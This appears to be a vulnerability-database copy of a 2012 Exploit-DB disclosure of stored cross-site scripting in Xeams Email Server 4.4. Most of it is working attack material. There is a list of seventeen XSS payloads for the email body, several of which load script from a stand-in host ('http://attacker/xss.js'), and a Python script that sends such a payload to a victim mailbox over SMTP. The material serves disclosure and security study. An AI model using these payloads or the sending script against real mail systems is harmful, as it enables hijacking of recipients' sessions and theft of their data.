Xeams Email Server XSS Vulnerability

vendor:

Xeams Email Server

by:

loneferret of Offensive Security

7.5

CVSS

HIGH

Cross-Site Scripting (XSS)

CWE

Product Name: Xeams Email Server

Affected Version From: 4.4 Build 5720

Affected Version To: 4.4 Build 5720

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows Server 2003 SP2

2012

Xeams Email Server XSS Vulnerability

The Xeams Email Server version 4.4 Build 5720 is vulnerable to Cross-Site Scripting (XSS) attacks. An attacker can inject malicious scripts into the body of an email, which will be executed when the recipient views the email. This can lead to unauthorized access, data theft, or further attacks on the victim's system.

Mitigation:

Upgrade to a patched version of Xeams Email Server. No other mitigation measures are provided.

Source

Exploit-DB raw data:

#!/usr/bin/python

'''

Author: loneferret of Offensive Security
Product: Xeams Email Server
Version: 4.4 Build 5720
Vendor Site: http://www.xeams.com

Timeline:
29 May 2012: Vulnerability reported to CERT
30 May 2012: Response received from CERT with disclosure date set to 20 Jul 2012
23 Jul 2012: Update from CERT: No response from vendor
08 Aug 2012: Public Disclosure

Installed On: Windows Server 2003 SP2
Client Test OS: Window 7 Pro SP1 (x86)
Browser Used: Internet Explorer 9

Injection Point: Body
Injection Payload(s):
1: ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{} 
2: <SCRIPT SRC=http://attacker/xss.js></SCRIPT> 
3: <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> 
4: <SCRIPT>alert('XSS')</SCRIPT> 
5: <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
6: </TITLE><SCRIPT>alert("XSS");</SCRIPT> 
7: <SCRIPT/XSS SRC="http://attacker/xss.js"></SCRIPT> 
8: <<SCRIPT>alert("XSS");//<</SCRIPT> 
9: <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> 
10: <SCRIPT>a=/XSS/
alert(a.source)</SCRIPT> 
11: <SCRIPT ="blah" SRC="http://attacker/xss.js"></SCRIPT> 
12: <SCRIPT a="blah" '' SRC="http://attacker/xss.js"></SCRIPT> 
13: <SCRIPT a=">" SRC="http://attacker/xss.js"></SCRIPT>
14: <SCRIPT "a='>'" SRC="http://attacker/xss.js"></SCRIPT> 
15: <SCRIPT a=`>` SRC="http://attacker/xss.js"></SCRIPT> 
16: <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://attacker/xss.js"></SCRIPT> 
17: <SCRIPT a=">'>" SRC="http://attacker/xss.js"></SCRIPT>

'''


import smtplib, urllib2
 
payload = """<SCRIPT SRC=http://attacker/xss.js></SCRIPT>"""
 
def sendMail(dstemail, frmemail, smtpsrv, username, password):
        msg  = "From: hacker@offsec.local\n"
        msg += "To: victim@victim.local\n"
        msg += 'Date: Today\r\n'
        msg += "Subject: Offensive Security\n"
        msg += "Content-type: text/html\n\n"
        msg += "XSS" + payload + "\r\n\r\n"
        server = smtplib.SMTP(smtpsrv)
        server.login(username,password)
        try:
                server.sendmail(frmemail, dstemail, msg)
        except Exception, e:
                print "[-] Failed to send email:"
                print "[*] " + str(e)
        server.quit()
 
username = "hacker@offsec.local"
password = "123456"
dstemail = "victim@victim.local"
frmemail = "hacker@offsec.local"
smtpsrv  = "172.16.84.171"
 
print "[*] Sending Email"
sendMail(dstemail, frmemail, smtpsrv, username, password)